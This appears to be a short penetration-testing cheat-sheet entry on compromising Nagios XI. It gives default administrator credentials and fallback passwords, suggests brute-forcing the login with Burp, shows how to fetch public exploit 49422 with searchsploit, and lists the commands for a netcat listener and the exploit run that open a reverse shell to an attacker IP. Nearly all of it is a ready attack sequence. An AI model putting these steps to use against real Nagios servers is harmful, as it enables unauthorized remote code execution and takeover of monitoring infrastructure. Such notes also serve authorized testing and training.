Nagios
Default creds:
user: nagiosadmin pass: PASSW0RD
If unsuccessful try password “admin” or bruteforce with burp
Exploit:
sudo searchsploit -m php/webapps/49422.py
Syntax:
python3 nagiosxi-rce.py http(s)://url username password reverse_ip reverse_port
nc -nvlp 443
python3 49422.py https://192.168.101.177 nagiosadmin admin 192.168.101.169 443
Last updated